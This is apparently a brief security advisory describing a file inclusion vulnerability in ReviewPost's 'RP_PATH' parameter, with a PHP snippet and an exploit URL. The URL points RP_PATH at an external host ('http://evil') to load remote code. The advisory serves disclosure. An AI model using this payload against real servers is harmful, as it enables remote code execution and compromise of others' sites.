Input passed to ReviewPost's "RP_PATH" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {
diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );
exit;
}
?>
Exploit:
The following URL can be used to trigger the vulnerability: http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil
